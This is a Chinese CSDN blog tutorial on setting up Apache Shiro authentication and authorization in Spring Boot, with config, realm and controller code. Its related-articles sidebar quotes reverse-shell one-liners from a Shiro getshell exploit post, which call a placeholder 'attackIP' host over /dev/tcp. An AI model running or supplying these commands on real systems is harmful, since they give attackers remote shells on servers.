shiro整合与简单实用

最新推荐文章于 2021-03-15 10:53:11 发布
最新推荐文章于 2021-03-15 10:53:11 发布
阅读量152 收藏
点赞数
分类专栏: 框架 文章标签: springboot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38361863/article/details/97529497
版权

1,添加依赖
pom.xml中加入

    <!-- https://mvnrepository.com/artifact/org.apache.shiro/shiro-spring -->
          <dependency>
              <groupId>org.apache.shiro</groupId>
              <artifactId>shiro-spring</artifactId>
              <version>1.4.1</version>
          </dependency>

2,ShiroConfig配置类

	    @Configuration
	    public class ShiroConfig {
	    
	    	/**
	    	 * 创建ShiroFilterFactoryBean
	    	 */
	    	@Bean
	    	public ShiroFilterFactoryBean  getShiroFilterFactoryBean(@Qualifier("securityManager") DefaultWebSecurityManager securityManager){
	    		ShiroFilterFactoryBean shiroFilterFactoryBean =new ShiroFilterFactoryBean();
	    		//设置安全管理器
	    		shiroFilterFactoryBean.setSecurityManager(securityManager);
	    		//设置shiro内置过滤器
	    		/**
	    		 * shiro内置过滤器,可以实现权限相关的拦截器
	    		 * 常用过滤器
	    		 *      anon:无需认证(登录)即可访问
	    		 *      authc:必须认证才能访问
	    		 *      user:如果使用rememberMe的功能可以直接访问
	    		 *      perms:该资源必须得到资源权限才可以访问
	    		 *      role:该资源必须得到角色权限才可以访问
	    		 */
	    		Map<String,String> filterMap=new LinkedHashMap<String,String>();
	    
	    		filterMap.put("/user/add","authc");
	    		filterMap.put("/user/update","perms[user:add]");//授权拦截,拦截之后会调到一个未授权页面
	    
	    		//设置登录页面
	    		shiroFilterFactoryBean.setLoginUrl("toLogin");
	    		//设置未授权页面
	    		shiroFilterFactoryBean.setUnauthorizedUrl("noAuth");
	    		shiroFilterFactoryBean.setFilterChainDefinitionMap(filterMap);
	    		return shiroFilterFactoryBean;
	    	}
	    
	    	/**
	    	 * 创建DefaultWebSecurityManager
	    	 */
	    	@Bean(name = "securityManager")
	    	public DefaultWebSecurityManager getDefaultWebSecurityManager(@Qualifier("userRealm") UserRealm userRealm){
	    		DefaultWebSecurityManager defaultWebSecurityManager=new DefaultWebSecurityManager();
	    		defaultWebSecurityManager.setRealm(userRealm);
	    		return defaultWebSecurityManager;
	    	}
	    
	    
	    	/**
	    	 * 创建Realm
	    	 * @return
	    	 */
	    	@Bean(name = "userRealm")
	    	public UserRealm getRealm(){
	    		return new UserRealm();
	    	}
	    }

3,UserRealm类

		
		public class UserRealm extends AuthorizingRealm {
			@Autowired
			private UserService userService;
			/**
			 * 执行授权逻辑
			 * @param principalCollection
			 * @return
			 */
			@Override
			protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) {
				System.out.println("执行授权逻辑");
				SimpleAuthorizationInfo info =new SimpleAuthorizationInfo();
				info.addStringPermission("user:add");
				return info;
			}
		
			/**
			 * 执行认证逻辑
			 * @param authenticationToken
			 * @return
			 * @throws AuthenticationException
			 */
			@Override
			protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException {
				System.out.println("执行认证逻辑");
				UsernamePasswordToken token= (UsernamePasswordToken) authenticationToken;
				User user=userService.find(token.getUsername());
		
				//1,用户名不存在
				if (user==null){
					return null;
				}
				//2,密码错误
				String pwd=user.getPwd();
				return new SimpleAuthenticationInfo(user,pwd,"");
			}
		}

3,UserController


		
		@Controller
		@RequestMapping("/user")
		public class UserController {
			@Autowired
			UserService userService;
		
			@RequestMapping("/login")
			public String login(String username, String pwd, Model model){
				//1,获取Subject
				Subject subject= SecurityUtils.getSubject();
				//2,讲用户数据封装
				UsernamePasswordToken token=new UsernamePasswordToken(username,pwd);
				//3,执行登录方法
				try {
					subject.login(token);//调用login时,执行UserRealm认证逻辑
					return "index";
				}catch (UnknownAccountException e){
					//用户名不存在
					model.addAttribute("msg","用户名不存在");
					return "login";
				}catch (IncorrectCredentialsException e){
					//密码错误
					model.addAttribute("msg","密码错误");
					return "/login";
				}
		
			}
		
		
			@RequestMapping("/noAuth")
			public String noAuth(){
				System.out.println("noAuth");
				return "noAuth";
			}
			/*public static void main(String[] args) {
				SpringApplication.run(UserController.class,args);
			}*/
		}

4,app


@EnableAutoConfiguration//自动配置,相当于写了spring配置文件
@MapperScan(basePackages = "com.dao")//自动扫描mapper包
@ComponentScan(basePackages = {"com.aspect","com.unit","com.shiro","com.service","com.controller","com.exception"})//自动扫描包下注解
@EnableAspectJAutoProxy(proxyTargetClass=true)
public class App {
	public static void main(String[] args) {

		SpringApplication.run(App.class,args);
	}
}
纵横江湖二十年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro简单使用
tangyue99的博客
06-09 624
自定义realm 添加shiro配置 1、配置安全管理器 2、配置shiro过滤器 这里拦截了所有路径并放行了登录接口路径 此时使用Postman测试可以发现登录接口可正常访问,删除接口返回以下信息 说明删除接口被正常拦截,需要登录才能访问只需在登录接口使用subject.login()即可将认证交给realm 修改登录接口如下: 修改认证方法如下: 此时,再次测试发现,直接调用删除接口一样出现此前的信息,这时只需要先调用登录接口,再调用删除接口即可正常返回信息,测试结果如下: 5、自定义授权方法 授
关于shiro简单实用
AhaoIsMe的博客
05-27 287
记录使用shiro的过程 1、导入3个包: shiro-web的jar shiro-spring的jar shiro-code的jar 2、web.xml配置 shiroFilter org.springframework.web.filter.DelegatingFilterProxy targetFilterLifecycle true
shiro简单实用
kay三石
10-28 144
shiro: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。 使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 单点登录:如果两个网站上通用一个账号来登录,那么就会把这认证操作去保存到一个中央服务器中去操作,这个中央服务器就是为了实现认证权限设计的,当你访...
Shiro简单使用
wei4264的博客
03-15 98
Shiro简单使用 简介 shiro是一个安全框架 可以完成:认证、授权、加密、会话管理、与Web 集成、缓存等功能。 下载地址 官网:http://shiro.apache.org/ github:https://github.com/apache/shiro 功能 Authentication:身份认证/登录,验证用户是不是拥有相应的身份 Authorization:授权,即权限验证,验证某个已认证的用户是否拥有某个权限;即判断用户是否能进行什么操作,如:验证某个用户是否拥
Shiro与SSM整合(内含详细文档介绍)
11-06
这个资料包中的"Shiro"文件可能包含了Shiro的核心类库和示例代码,"简单实用说明.txt"可能是关于整合过程的简要指南,而"M-Shiro"和"ShiroSSM"可能是更详细的文档或者示例项目,帮助开发者深入理解Shiro与SSM的整合...
SpringBootShiro整合-权限管理的简单权限系统.zip
最新发布
02-04
总的来说,"SpringBootShiro整合-权限管理的简单权限系统"是一个实用的学习案例,它将帮助开发者掌握如何在SpringBoot应用中构建安全的权限控制系统,提升应用的安全性和用户体验。对于初学者来说,这是一个很好的...
springboot+shiro+swagger2前后端分离整合
03-03
本项目"springboot+shiro+swagger2前后端分离整合"提供了一个实用的框架组合,旨在帮助开发者快速搭建这样的应用。以下是对这个项目及其组成部分的详细解析: 1. **Spring Boot**: Spring Boot是由Pivotal团队...
pringmvc整合shiro权限控制的实例教程共15页
10-31
SpringMVC与Shiro整合是Java Web开发中常见的权限控制技术组合,主要用于实现用户认证(Authentication)和授权(Authorization)功能。本教程共15页,详细介绍了如何将这两个框架结合,以创建一个安全的、有权限...
SpringBootShiro整合-权限管理实战源码.zip
05-22
下面我们将详细探讨SpringBootShiro整合实现权限管理实战中的关键知识点。 1. **SpringBoot简介** SpringBoot是由Pivotal团队提供的全新框架,旨在简化Spring应用的初始搭建以及开发过程。它通过“约定优于配置...
SpringMVC+MyBatis+EasyUI+Shiro资源整合框架
09-12
新搭建的SSM框架(参考文章比较多大部分代码都是从网上学习搭建的),并且在新学的基础上整合了EasyUI 跟 Shiro安全登陆(目前只实现接口+配置文件《没有提供登陆成功后的处理跟权限认证,感兴趣的自己学习下吧!》)。EasyUI实现了拦截器SQL分页,支持Oracle跟MySql(未提供数据库自己新建一个User更改下数据链接就可以)。jar包(Spring4.25 MyBatis3.1.1)未涉及Maven,因个人对Maven运行还不够成熟,采用了Tomcat+JDK7.0。
Shiro+easyUI+SpringMVC实现登录认证
热门推荐
波波烤鸭的博客
04-22 5万+
  最近在做一个小项目,其中认证这块使用shiro+SpringMVC+easyUI,因为easyUI在提交数据的时候使用的是ajax的异步提交,所以shiro在处理数据的时候需要重写FormAuthenticationFilter的相关方法,所以在此记录下实现的过程,以供大伙参考。   本文只给出核心代码,完整代码可去本人github上查看 https://github.com/q2795838...
shiro权限框架简单入门demo
allen的博客
12-11 6247
shiro和spring security都是开源的权限框架,shiro相对于spring security来说更简单学习成本更低,并且提供的API也明了,下面是shiro官方的一个图: 其中把上面的东西抽象出来主要分为几个块(网上找的文档抠出来的): 1.SubjectSubject即主体,外部应用与subject进行交互,subject记录了当前操作用户,将用户的概念理解为当前操作的主体,可能是
30分钟学会如何使用Shiro
weixin_30426879的博客
07-22 1121
本篇内容大多总结自张开涛的《跟我学Shiro》原文地址:http://jinnianshilongnian.iteye.com/blog/2018936 我并没有全部看完,只是选择了一部分对我来说急需在项目中使用的知识加以学习。并且对于大多数第一次接触Shiro的同学来说,掌握这些也应该足够了。 一、架构 要学习如何使用Shiro必须先从它的架构谈起,作为一款安全框架Shiro的设计相当精妙...
shiro使用(简单登录流程)
特别享受思考问题的过程
03-21 3511
既然要做,就做的细致一点,对得起自己! shiro使用前配置: 1.pom文件中引入shiro-spring集成的jar包。 2.web.xml中配置shiro的过滤器,拦截所有请求。 <filter> <filter-name>shiroFilter</filter-name> <filter-class>...
【实战】Apache shiro<=1.2.4 getshell
weixin_30404405的博客
08-12 248
方法一 利用JRMPClient 反弹shell方式 Bash: bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1 0<&196;exec 196<>/dev/tcp...
Springbooot集成Shiro简单使用
我真的很不错的博客
09-24 351
文章目录1.Shiro架构2.Shiro环境搭建3.Shiro用户登录拦截与认证 1.Shiro架构 Shiro三个主要的概念: Subject SecurityManager Realms Shiro外部架构 Subject:主体,当前参与应用安全部分的主体。可以是用户,可以是第三方服务,可以是cron 任务,或者任何东西。主要指一个正在与当前软件交互的东西。所有Subject都需要SecurityManager,当与Subject进行交互,这些交互行为实际上被转换为与SecurityManage
Java EE7与Apache Shiro整合实战
Shiro哲学的核心在于其简单性,它不是基于复杂的控制层模型(如BCE边界控制实体,而非MVC),而是直接与业务逻辑代码交互,使得安全控制更为直观。这使得开发者可以更专注于应用的业务功能,而不需要深入了解复杂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值